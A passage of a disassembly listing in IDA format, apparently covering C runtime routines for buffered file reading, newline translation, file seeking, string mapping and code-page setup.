pop edi
pop esi
retn
sub_41E224 endp
; =============== S U B R O U T I N E =======================================
sub_41E248 proc near ; CODE XREF: sub_418A86+A9�p
; sub_41900C+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41E31C
test al, 40h
jnz loc_41E31C
test al, 2
jz short loc_41E26E
or al, 20h
mov [esi+0Ch], eax
jmp loc_41E31C
; ---------------------------------------------------------------------------
loc_41E26E: ; CODE XREF: sub_41E248+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41E282
push esi
call sub_41F9D8
pop ecx
jmp short loc_41E287
; ---------------------------------------------------------------------------
loc_41E282: ; CODE XREF: sub_41E248+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41E287: ; CODE XREF: sub_41E248+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41E321
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_41E30B
cmp eax, 0FFFFFFFFh
jz short loc_41E30B
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41E2E0
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41E2C9
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, ds:dword_48B340[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41E2CE
; ---------------------------------------------------------------------------
loc_41E2C9: ; CODE XREF: sub_41E248+6B�j
mov edi, offset dword_43BC20
loc_41E2CE: ; CODE XREF: sub_41E248+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41E2E0
or dh, 20h
mov [esi+0Ch], edx
loc_41E2E0: ; CODE XREF: sub_41E248+62�j
; sub_41E248+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41E2FD
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41E2FD
test ch, 4
jnz short loc_41E2FD
mov dword ptr [esi+18h], 1000h
loc_41E2FD: ; CODE XREF: sub_41E248+9F�j
; sub_41E248+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E30B: ; CODE XREF: sub_41E248+55�j
; sub_41E248+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41E31C: ; CODE XREF: sub_41E248+A�j
; sub_41E248+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41E248 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E321 proc near ; CODE XREF: sub_418A86+90�p
; sub_41E248+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, ds:dword_48B440
jnb loc_41E4FE
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:48B340h[eax*4]
mov eax, ds:dword_48B340[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41E4FE
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41E3D6
test dl, 2
jnz short loc_41E3D6
test dl, 48h
jz short loc_41E396
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41E396
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41E396: ; CODE XREF: sub_41E321+56�j
; sub_41E321+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call ds:off_424074
test eax, eax
jnz short loc_41E3E9
call ds:dword_42408C ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_41E3D1
mov ds:dword_48A014, 9
mov ds:dword_48A018, ecx
jmp loc_41E50F
; ---------------------------------------------------------------------------
loc_41E3D1: ; CODE XREF: sub_41E321+99�j
cmp eax, 6Dh
jnz short loc_41E3DD
loc_41E3D6: ; CODE XREF: sub_41E321+4C�j
; sub_41E321+51�j
xor eax, eax
jmp loc_41E512
; ---------------------------------------------------------------------------
loc_41E3DD: ; CODE XREF: sub_41E321+B3�j
push eax
call sub_41EF44
pop ecx
jmp loc_41E50F
; ---------------------------------------------------------------------------
loc_41E3E9: ; CODE XREF: sub_41E321+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41E4F9
test edx, edx
jz short loc_41E40E
cmp byte ptr [edi], 0Ah
jnz short loc_41E40E
or al, 4
jmp short loc_41E410
; ---------------------------------------------------------------------------
loc_41E40E: ; CODE XREF: sub_41E321+E2�j
; sub_41E321+E7�j
and al, 0FBh
loc_41E410: ; CODE XREF: sub_41E321+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41E4F3
loc_41E428: ; CODE XREF: sub_41E321+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41E4E3
cmp al, 0Dh
jz short loc_41E444
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41E4D5
; ---------------------------------------------------------------------------
loc_41E444: ; CODE XREF: sub_41E321+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41E462
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41E459
add [ebp+arg_8], 2
jmp short loc_41E4B7
; ---------------------------------------------------------------------------
loc_41E459: ; CODE XREF: sub_41E321+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41E4D5
; ---------------------------------------------------------------------------
loc_41E462: ; CODE XREF: sub_41E321+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:off_424074
test eax, eax
jnz short loc_41E48A
call ds:dword_42408C ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41E4D1
loc_41E48A: ; CODE XREF: sub_41E321+15D�j
cmp [ebp+var_C], 0
jz short loc_41E4D1
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41E4AC
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41E4B7
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41E4D5
; ---------------------------------------------------------------------------
loc_41E4AC: ; CODE XREF: sub_41E321+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41E4BC
cmp [ebp+var_1], 0Ah
jnz short loc_41E4BC
loc_41E4B7: ; CODE XREF: sub_41E321+136�j
; sub_41E321+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41E4D4
; ---------------------------------------------------------------------------
loc_41E4BC: ; CODE XREF: sub_41E321+18E�j
; sub_41E321+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41E517
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41E4D5
loc_41E4D1: ; CODE XREF: sub_41E321+167�j
; sub_41E321+16D�j
mov byte ptr [edi], 0Dh
loc_41E4D4: ; CODE XREF: sub_41E321+199�j
inc edi
loc_41E4D5: ; CODE XREF: sub_41E321+11E�j
; sub_41E321+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41E428
jmp short loc_41E4F3
; ---------------------------------------------------------------------------
loc_41E4E3: ; CODE XREF: sub_41E321+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41E4F3
or al, 2
mov [esi], al
loc_41E4F3: ; CODE XREF: sub_41E321+101�j
; sub_41E321+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41E4F9: ; CODE XREF: sub_41E321+DA�j
mov eax, [ebp+var_8]
jmp short loc_41E512
; ---------------------------------------------------------------------------
loc_41E4FE: ; CODE XREF: sub_41E321+12�j
; sub_41E321+39�j
and ds:dword_48A018, 0
mov ds:dword_48A014, 9
loc_41E50F: ; CODE XREF: sub_41E321+AB�j
; sub_41E321+C3�j
or eax, 0FFFFFFFFh
loc_41E512: ; CODE XREF: sub_41E321+B7�j
; sub_41E321+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E321 endp
; =============== S U B R O U T I N E =======================================
sub_41E517 proc near ; CODE XREF: sub_418D0E+67�p
; sub_419D23+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, ds:dword_48B440
push esi
push edi
jnb short loc_41E599
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:48B340h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_41E599
push eax
call sub_41FE32
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41E55B
mov ds:dword_48A014, 9
jmp short loc_41E5AA
; ---------------------------------------------------------------------------
loc_41E55B: ; CODE XREF: sub_41E517+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call ds:off_4240C0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41E57B
call ds:dword_42408C ; RtlGetLastWin32Error
jmp short loc_41E57D
; ---------------------------------------------------------------------------
loc_41E57B: ; CODE XREF: sub_41E517+5A�j
xor eax, eax
loc_41E57D: ; CODE XREF: sub_41E517+62�j
test eax, eax
jz short loc_41E58A
push eax
call sub_41EF44
pop ecx
jmp short loc_41E5AA
; ---------------------------------------------------------------------------
loc_41E58A: ; CODE XREF: sub_41E517+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_41E5AD
; ---------------------------------------------------------------------------
loc_41E599: ; CODE XREF: sub_41E517+D�j
; sub_41E517+2A�j
and ds:dword_48A018, 0
mov ds:dword_48A014, 9
loc_41E5AA: ; CODE XREF: sub_41E517+42�j
; sub_41E517+71�j
or eax, 0FFFFFFFFh
loc_41E5AD: ; CODE XREF: sub_41E517+80�j
pop edi
pop esi
pop ebx
retn
sub_41E517 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5B1 proc near ; CODE XREF: sub_418D0E+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41E5CD
mov [edi+4], ebx
loc_41E5CD: ; CODE XREF: sub_41E5B1+17�j
push 1
push ebx
push esi
call sub_41E517
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41E63B
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_41E5F2
sub eax, [edi+4]
jmp loc_41E704
; ---------------------------------------------------------------------------
loc_41E5F2: ; CODE XREF: sub_41E5B1+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_41E62C
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, ds:dword_48B340[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_41E643
mov edx, ecx
loc_41E61D: ; CODE XREF: sub_41E5B1+79�j
cmp edx, eax
jnb short loc_41E643
cmp byte ptr [edx], 0Ah
jnz short loc_41E629
inc [ebp+var_8]
loc_41E629: ; CODE XREF: sub_41E5B1+73�j
inc edx
jmp short loc_41E61D
; ---------------------------------------------------------------------------
loc_41E62C: ; CODE XREF: sub_41E5B1+50�j
test dl, 80h
jnz short loc_41E643
mov ds:dword_48A014, 16h
loc_41E63B: ; CODE XREF: sub_41E5B1+2D�j
or eax, 0FFFFFFFFh
jmp loc_41E704
; ---------------------------------------------------------------------------
loc_41E643: ; CODE XREF: sub_41E5B1+68�j
; sub_41E5B1+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_41E651
mov eax, [ebp+var_8]
jmp loc_41E704
; ---------------------------------------------------------------------------
loc_41E651: ; CODE XREF: sub_41E5B1+96�j
test byte ptr [edi+0Ch], 1
jz loc_41E6FC
mov edx, [edi+4]
test edx, edx
jnz short loc_41E66A
and [ebp+var_8], edx
jmp loc_41E6FC
; ---------------------------------------------------------------------------
loc_41E66A: ; CODE XREF: sub_41E5B1+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:48B340h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_41E6F6
push 2
push 0
push [ebp+var_C]
call sub_41E517
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41E6BD
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_41E6A8: ; CODE XREF: sub_41E5B1+104�j
cmp eax, ecx
jnb short loc_41E6B7
cmp byte ptr [eax], 0Ah
jnz short loc_41E6B4
inc [ebp+arg_0]
loc_41E6B4: ; CODE XREF: sub_41E5B1+FE�j
inc eax
jmp short loc_41E6A8
; ---------------------------------------------------------------------------
loc_41E6B7: ; CODE XREF: sub_41E5B1+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_41E6F1
; ---------------------------------------------------------------------------
loc_41E6BD: ; CODE XREF: sub_41E5B1+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41E517
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41E6E4
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41E6E4
test ch, 4
jz short loc_41E6E7
loc_41E6E4: ; CODE XREF: sub_41E5B1+124�j
; sub_41E5B1+12C�j
mov eax, [edi+18h]
loc_41E6E7: ; CODE XREF: sub_41E5B1+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41E6F1: ; CODE XREF: sub_41E5B1+10A�j
jz short loc_41E6F6
inc [ebp+arg_0]
loc_41E6F6: ; CODE XREF: sub_41E5B1+D9�j
; sub_41E5B1:loc_41E6F1�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41E6FC: ; CODE XREF: sub_41E5B1+A4�j
; sub_41E5B1+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41E704: ; CODE XREF: sub_41E5B1+3C�j
; sub_41E5B1+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41E5B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E709 proc near ; CODE XREF: sub_419063+47�p
; sub_419063+74�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4248E0
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_48A0C0, edi
jnz short loc_41E77F
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_4248D8
mov esi, 100h
push esi
push edi
call ds:dword_4241C8 ; LCMapStringW
test eax, eax
jz short loc_41E75D
mov ds:dword_48A0C0, ebx
jmp short loc_41E77F
; ---------------------------------------------------------------------------
loc_41E75D: ; CODE XREF: sub_41E709+4A�j
push edi
push edi
push ebx
push offset dword_43C824
push esi
push edi
call ds:dword_4241C4 ; LCMapStringA
test eax, eax
jz loc_41E897
mov ds:dword_48A0C0, 2
loc_41E77F: ; CODE XREF: sub_41E709+2E�j
; sub_41E709+52�j
cmp [ebp+arg_C], edi
jle short loc_41E794
push [ebp+arg_C]
push [ebp+arg_8]
call sub_422467
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_41E794: ; CODE XREF: sub_41E709+79�j
mov eax, ds:dword_48A0C0
cmp eax, 2
jnz short loc_41E7BB
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C4 ; LCMapStringA
jmp loc_41E899
; ---------------------------------------------------------------------------
loc_41E7BB: ; CODE XREF: sub_41E709+93�j
cmp eax, 1
jnz loc_41E897
cmp [ebp+arg_18], edi
jnz short loc_41E7D1
mov eax, ds:dword_48A0B8
mov [ebp+arg_18], eax
loc_41E7D1: ; CODE XREF: sub_41E709+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_424070 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_41E897
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41E82C
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_41E82C: ; CODE XREF: sub_41E709+10E�j
cmp [ebp+var_24], edi
jz short loc_41E897
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_424070 ; MultiByteToWideChar
test eax, eax
jz short loc_41E897
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C8 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_41E897
test byte ptr [ebp+arg_4+1], 4
jz short loc_41E8AB
cmp [ebp+arg_14], edi
jz loc_41E926
cmp esi, [ebp+arg_14]
jg short loc_41E897
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C8 ; LCMapStringW
test eax, eax
jnz loc_41E926
loc_41E897: ; CODE XREF: sub_41E709+66�j
; sub_41E709+B5�j ...
xor eax, eax
loc_41E899: ; CODE XREF: sub_41E709+AD�j
; sub_41E709+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41E8AB: ; CODE XREF: sub_41E709+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41E8DF
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_41E8DF: ; CODE XREF: sub_41E709+1C2�j
cmp ebx, edi
jz short loc_41E897
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C8 ; LCMapStringW
test eax, eax
jz short loc_41E897
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_41E906
push edi
push edi
jmp short loc_41E90C
; ---------------------------------------------------------------------------
loc_41E906: ; CODE XREF: sub_41E709+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41E90C: ; CODE XREF: sub_41E709+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_424150 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_41E897
loc_41E926: ; CODE XREF: sub_41E709+165�j
; sub_41E709+188�j
mov eax, esi
jmp loc_41E899
sub_41E709 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E92D proc near ; CODE XREF: sub_41ECF1+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41EAC6 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, ds:dword_48B444
mov [ebp+arg_0], esi
jz loc_41EABA
xor ebx, ebx
cmp esi, ebx
jz loc_41EAB0
xor edx, edx
mov eax, offset dword_43B940
loc_41E961: ; CODE XREF: sub_41E92D+41�j
cmp [eax], esi
jz short loc_41E9D7
add eax, 30h
inc edx
cmp eax, offset dword_43BA30
jl short loc_41E961
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_4241CC ; GetCPInfo
cmp eax, 1
jnz loc_41EAA8
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_48B560
cmp [ebp+var_18], 1
mov ds:dword_48B444, esi
rep stosd
stosb
mov ds:dword_48B664, ebx
jbe loc_41EA96
cmp [ebp+var_12], 0
jz loc_41EA6C
lea ecx, [ebp+var_11]
loc_41E9B4: ; CODE XREF: sub_41E92D+139�j
mov dl, [ecx]
test dl, dl
jz loc_41EA6C
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_41E9C5: ; CODE XREF: sub_41E92D+A8�j
cmp eax, edx
ja loc_41EA60
or ds:byte_48B561[eax], 4
inc eax
jmp short loc_41E9C5
; ---------------------------------------------------------------------------
loc_41E9D7: ; CODE XREF: sub_41E92D+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_48B560
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_43B950[esi]
loc_41E9F3: ; CODE XREF: sub_41E92D+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_41EA26
loc_41E9FA: ; CODE XREF: sub_41E92D+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_41EA26
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_41EA1F
mov edx, [ebp+var_4]
mov dl, ds:byte_43B938[edx]
loc_41EA14: ; CODE XREF: sub_41E92D+F0�j
or ds:byte_48B561[eax], dl
inc eax
cmp eax, edi
jbe short loc_41EA14
loc_41EA1F: ; CODE XREF: sub_41E92D+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_41E9FA
loc_41EA26: ; CODE XREF: sub_41E92D+CB�j
; sub_41E92D+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_41E9F3
mov eax, [ebp+arg_0]
mov ds:dword_48B45C, 1
push eax
mov ds:dword_48B444, eax
call sub_41EB10
lea esi, dword_43B944[esi]
mov edi, offset dword_48B450
movsd
movsd
pop ecx
mov ds:dword_48B664, eax
movsd
jmp short loc_41EAB5
; ---------------------------------------------------------------------------
loc_41EA60: ; CODE XREF: sub_41E92D+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41E9B4
loc_41EA6C: ; CODE XREF: sub_41E92D+7E�j
; sub_41E92D+8B�j
push 1
pop eax
loc_41EA6F: ; CODE XREF: sub_41E92D+14F�j
or ds:byte_48B561[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41EA6F
push esi
call sub_41EB10
pop ecx
mov ds:dword_48B664, eax
mov ds:dword_48B45C, 1
jmp short loc_41EA9C
; ---------------------------------------------------------------------------
loc_41EA96: ; CODE XREF: sub_41E92D+74�j
mov ds:dword_48B45C, ebx
loc_41EA9C: ; CODE XREF: sub_41E92D+167�j
xor eax, eax
mov edi, offset dword_48B450
stosd
stosd
stosd
jmp short loc_41EAB5
; ---------------------------------------------------------------------------
loc_41EAA8: ; CODE XREF: sub_41E92D+51�j
cmp ds:dword_48A0C4, ebx
jz short loc_41EABE
loc_41EAB0: ; CODE XREF: sub_41E92D+27�j
call sub_41EB43
loc_41EAB5: ; CODE XREF: sub_41E92D+131�j
; sub_41E92D+179�j
call sub_41EB6C
loc_41EABA: ; CODE XREF: sub_41E92D+1D�j
xor eax, eax
jmp short loc_41EAC1
; ---------------------------------------------------------------------------
loc_41EABE: ; CODE XREF: sub_41E92D+181�j
or eax, 0FFFFFFFFh
loc_41EAC1: ; CODE XREF: sub_41E92D+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E92D endp
; =============== S U B R O U T I N E =======================================
sub_41EAC6 proc near ; CODE XREF: sub_41E92D+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and ds:dword_48A0C4, 0
cmp eax, 0FFFFFFFEh
jnz short loc_41EAE6
mov ds:dword_48A0C4, 1
jmp ds:dword_424050
; ---------------------------------------------------------------------------
loc_41EAE6: ; CODE XREF: sub_41EAC6+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_41EAFB
mov ds:dword_48A0C4, 1
jmp ds:dword_4241D0
; ---------------------------------------------------------------------------
loc_41EAFB: ; CODE XREF: sub_41EAC6+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_41EB0F
mov eax, ds:dword_48A0B8
mov ds:dword_48A0C4, 1
locret_41EB0F: ; CODE XREF: sub_41EAC6+38�j
retn
sub_41EAC6 endp
; =============== S U B R O U T I N E =======================================
sub_41EB10 proc near ; CODE XREF: sub_41E92D+118�p
; sub_41E92D+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_41EB3D
sub eax, 4
jz short loc_41EB37
sub eax, 0Dh
jz short loc_41EB31
dec eax
jz short loc_41EB2B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41EB2B: ; CODE XREF: sub_41EB10+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41EB31: ; CODE XREF: sub_41EB10+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41EB37: ; CODE XREF: sub_41EB10+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41EB3D: ; CODE XREF: sub_41EB10+9�j
mov eax, 411h
retn
sub_41EB10 endp
; =============== S U B R O U T I N E =======================================
sub_41EB43 proc near ; CODE XREF: sub_41E92D:loc_41EAB0�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_48B560
rep stosd
stosb
xor eax, eax
mov edi, offset dword_48B450
mov ds:dword_48B444, eax
mov ds:dword_48B45C, eax
mov ds:dword_48B664, eax
stosd
stosd
stosd
pop edi
retn
sub_41EB43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB6C proc near ; CODE XREF: sub_41E92D:loc_41EAB5�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push ds:dword_48B444
call ds:dword_4241CC ; GetCPInfo
cmp eax, 1
jnz loc_41ECA5
xor eax, eax
mov esi, 100h
loc_41EB96: ; CODE XREF: sub_41EB6C+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_41EB96
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_41EBE7
push ebx
push edi
lea edx, [ebp+var_D]
loc_41EBB5: ; CODE XREF: sub_41EB6C+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41EBDC
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41EBDC: ; CODE XREF: sub_41EB6C+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_41EBB5
pop edi
pop ebx
loc_41EBE7: ; CODE XREF: sub_41EB6C+42�j
push 0
lea eax, [ebp+var_514]
push ds:dword_48B664
push ds:dword_48B444
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_41FB63
push 0
lea eax, [ebp+var_214]
push ds:dword_48B444
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push ds:dword_48B664
call sub_41E709
push 0
lea eax, [ebp+var_314]
push ds:dword_48B444
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push ds:dword_48B664
call sub_41E709
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_41EC62: ; CODE XREF: sub_41EB6C+135�j
mov dx, [ecx]
test dl, 1
jz short loc_41EC80
or ds:byte_48B561[eax], 10h
mov dl, [ebp+eax+var_214]
